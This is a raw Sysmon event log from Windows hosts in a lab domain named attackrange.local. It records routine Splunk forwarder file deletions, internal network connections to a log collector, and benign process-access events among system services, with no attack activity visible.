
SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=A58736E2B09577D46FC6CFDF6DEF27AE,SHA256=0BB00C61963F04D875232B0F6B587C675B19C926DCF8C372186611CDC417C023,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047535Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:38.251{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A0E703AFEA2A05EA585A428FC6F5F58,SHA256=345F5D9C2A43210B12581C0B8B04773160FD2EBDE0A7767AF8210C40A114E5FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806932Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:39.931{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AB77908FA68F13E0F10AD35DFC6033A,SHA256=B3F59C1736159F170D809F0EAFFC2BC8E8CE146EED9CA23681AE0D6765E085FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047537Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:39.281{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E2118A058A87A7BDDB4B6984BCF9A1B,SHA256=E6299D7284CF72DA4BE0D0D7881222FFE381872FBCB1E2DDE6CCC186EA650FF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806934Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:40.962{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E563817945719B39415F87EE4834E991,SHA256=3CA3CBC64C0E5B59B4437ABFEB12932410FFABB48E343E7647935307EB23788C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047538Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:40.296{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEF48B4BAC1F726516410DCF524841B3,SHA256=350DD9BDBE5DEC6AD4FB75B7010598F3483324510236FE630DA08416EA3875D5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806933Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:39.360{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57218-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806935Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:41.978{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AA53A1B373B052BAD98183E42EAC480,SHA256=B8C5F2AF2D8308838213417B5739C393921D85EF2B126DE201E8C18C96F921AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047542Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:48:41.429{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047541Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:41.429{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047540Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:48:41.428{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047539Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:41.310{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5F7C46294A8D69F22BECF393CDACB0E,SHA256=0951975F854B699524AD5CC13CBB9D0ECDC3593467E0A337409830EBC348E800,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806936Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:42.994{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45908D51261B717C00F6842DF0619869,SHA256=3F61788BDA807400ABFA3F2BFD792DD1E11B2FF8ADFA1639968E874525FF444E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047543Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:48:42.329{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADC43EACCE9D8AD964E21638B00F2A97,SHA256=F0E0853DE7315C7C1860C5840612BA316F199E10B201A5C7819DA27F0B6B89DD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047545Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:34.599{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50971-false10.0.1.12-8000- 23542300x80000000000000001047544Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:43.348{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9882679075407E5411D425200E7E283F,SHA256=8251B38414FACDC8A695521419680E726C4CF44EBB54DFA81CB5A6A1E4F9FC14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047546Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:44.363{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32B550B24512271BFAE48D236CEB3FD5,SHA256=5E91A418118D788F4037281EEF8ACD1B6E9D122565C8F277344D74A9A371087C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806937Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:44.039{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5AC530C60B7039032F2795BCA136174,SHA256=08143EF8F79EF18F464118CB60E372B0A1E22E934C80DEDCE48D983BBBD2BD5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047547Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:45.393{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0EA3F9C3F999B5BD80E54E1401DBB8F,SHA256=EC6545D56C26D3A2C5E62688882E9F9253839AF8B70452A06BB36C1CDF810B36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806938Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:45.041{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE4E8DA422C2F9C2033EB2B5A6B2E1C9,SHA256=F8AB9D99E020F52E89F942D0E3894DAC95D32438266E6A0D333D843C00891D40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047548Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:46.408{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B70FD1F3C6A249007D4E4A565D9DAF28,SHA256=D566B9F2B4D31257FC09DB394A126B9715C3B11A25B48B0368470C5398FB5125,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000806939Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:46.041{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA328F5B03D3413E0EC68540B0B7951D,SHA256=BB22DD7A0C4AE98363875FAD319B97C319190BC071DB51F23E0E740E84128BD1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047550Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:39.758{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50972-false10.0.1.12-8000- 23542300x80000000000000001047549Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:47.424{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2081E51F8A0B1C14A793418917EFD61,SHA256=BE22AE7E47D62224EFE799A01170CF2EB241C9ED7A02A91D0779AF6FBE5F8DDD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806941Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:45.330{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57219-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806940Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:47.057{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=880DDF48CA22D26DC93B48E2FF4F3D7E,SHA256=B6AF809A6748C4E400CBE00C80D1C138E1DD9921B584F3E062D9C0D0BB159DFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047557Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:48.443{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44105EED7C7FBF31783E49E210587731,SHA256=0E7B38C8DEDACB5EEF1E5A4991B16638C6021E8D15876F171E38E74723EAA0E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806942Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:48.119{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DFF04D624CD4B8698DDBE28DC5DB138,SHA256=057C40A838ADCE9F301CA2BA8653FE97C66B4E8D94E21D4EF31828EB86BC56A3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047556Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:48.090{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F3E0-60EB-0C7D-00000000CF01}8756C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001047555Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:48.090{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F3E0-60EB-0C7D-00000000CF01}8756C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047554Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:48.074{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F3E0-60EB-0C7D-00000000CF01}8756C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047553Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:48.059{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F3E0-60EB-0C7D-00000000CF01}8756C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 
10341000x80000000000000001047552Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:48.059{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F3E0-60EB-0C7D-00000000CF01}8756C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047551Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:48.059{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F3E0-60EB-0C7D-00000000CF01}8756C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047560Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:49.458{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAF118B736CA86D47703469B62878C39,SHA256=CD60E1A860AAD0894068D759C0B520A605542D0FFBCEC56833CB25FB2CDD10FF,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000806943Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:49.135{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=680BE8178CDAFDD7D9F777C4DBE54AED,SHA256=F5D08CFF20818D8A62EAED46BE73EF295E6AF507BEFE2266683F6953AE2D443B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047559Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:49.058{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E0D02F7B01C021201C015C9E53D43008,SHA256=BFEA0F27BD20FC7392EB5A1CB0CB0A6C6C9CD53A191B3685D2D1E62AA4A8D858,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047558Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:49.058{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F2433A24315A2832E989A303883D45F6,SHA256=69C87F84752497B52D6BE7F9249FE99695D4753907B7054B4BC091F35487486C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047578Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.725{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3E2-60EB-0E7D-00000000CF01}9460C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047577Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.724{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047576Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:48:50.723{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047575Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.723{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047574Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
